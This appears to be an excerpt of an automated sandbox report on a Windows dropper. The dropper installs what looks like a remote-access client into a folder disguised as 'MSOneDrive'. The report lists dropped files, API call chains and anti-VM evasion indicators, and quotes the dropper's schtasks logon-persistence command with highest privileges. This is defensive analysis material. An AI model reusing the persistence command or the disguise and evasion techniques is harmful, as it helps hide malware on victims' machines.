                                Source: HTCTL32.DLL.3.drStatic PE information: real checksum: 0x4fbb5 should be: 0x525c4
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: real checksum: 0x0 should be: 0x298fc
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: section name: .config
                                Source: wfapigp.dll.3.drStatic PE information: section name: .didat
                                Source: PCICL32.DLL.3.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C97F81 push ecx; ret 3_2_00C97F94
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1115DA35 push ecx; ret 11_2_1115DA48
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11158929 push ecx; ret 11_2_1115893C
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C83492F push ecx; ret 11_2_6C834942
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1115DA35 push ecx; ret 13_2_1115DA48
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11158929 push ecx; ret 13_2_1115893C
                                Source: msvcr100.dll.3.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\dpnathlp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\WerEnc.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\msvcp140_codecvt_ids.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\dpnhupnp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\winrssrv.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\client32.exeJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\dxmasf.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\dpnlobby.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\winrsmgr.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\msvcr100_clr0400.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\getuname.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\icmp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\wiatrace.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\ir41_qcx.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\wfapigp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\ir50_32.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\UIManagerBrokerps.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeFile created: C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C815690 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,11_2_6C815690
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C803C17 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,11_2_6C803C17
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C803F90 GetPrivateProfileIntA,11_2_6C803F90
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C815A28 GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,11_2_6C815A28

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11119810 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,11_2_11119810
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11129D80 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,11_2_11129D80
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11023040 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11023040
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110B7590 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,11_2_110B7590
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_11149BF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_11149BF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11105AE0 IsIconic,11_2_11105AE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110C1C00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110C1C00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11149FF0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,11_2_11149FF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11024350 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,11_2_11024350
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11114780 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_11114780
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110247A0 IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_110247A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_111066E0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,11_2_111066E0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11022970 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,11_2_11022970
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11023040 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11023040
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110B7590 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,13_2_110B7590
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_11149BF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_11149BF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11105AE0 IsIconic,13_2_11105AE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11129D80 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,13_2_11129D80
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110C1C00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110C1C00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11149FF0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,13_2_11149FF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11024350 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,13_2_11024350
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11114780 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,13_2_11114780
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110247A0 IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_110247A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_111066E0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,13_2_111066E0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11022970 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,13_2_11022970
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11081000 LoadLibraryA,LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_11081000
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Delayed program exit found
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110AECE0 Sleep,ExitProcess,11_2_110AECE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110AECE0 Sleep,ExitProcess,13_2_110AECE0
                                Found evasive API chain (may stop execution after checking mutex)
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-10565
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-10565
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeWindow / User API: threadDelayed 461Jump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeWindow / User API: threadDelayed 8373Jump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dpnathlp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\icmp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\wiatrace.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\WerEnc.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\ir41_qcx.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\msvcp140_codecvt_ids.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\wfapigp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\ir50_32.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dpnhupnp.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\UIManagerBrokerps.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\winrssrv.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dxmasf.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\dpnlobby.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\winrsmgr.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\msvcr100_clr0400.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\MSOneDrive\getuname.dllJump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeEvaded block: after key decisiongraph_3-10702
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-87296
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-87654
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-87960
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88012
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88175
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88174
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decisiongraph_11-88529
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-82866
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI coverage: 6.0 %
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI coverage: 2.9 %
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe TID: 7448Thread sleep time: -115250s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe TID: 7452Thread sleep time: -34400s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe TID: 7448Thread sleep time: -2093250s >= -30000sJump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C811780 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C81186Fh11_2_6C811780
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C8F905 FindFirstFileExW,3_2_00C8F905
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11061140
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,11_2_11065870
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110B3B00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102BB50
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111180C0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_110FE450
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102BB50
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_11061140
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,13_2_11065870
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,13_2_110B3B00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111180C0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_110FE450
                                Source: HTCTL32.DLL.3.drBinary or memory string: VMware
                                Source: client32.exe, 0000000B.00000002.3743777363.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
                                Source: client32.exe, 0000000B.00000002.3743777363.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|
                                Source: HTCTL32.DLL.3.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.3.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.000000000105E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.3743777363.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: TCCTL32.DLL.3.drBinary or memory string: VMWare
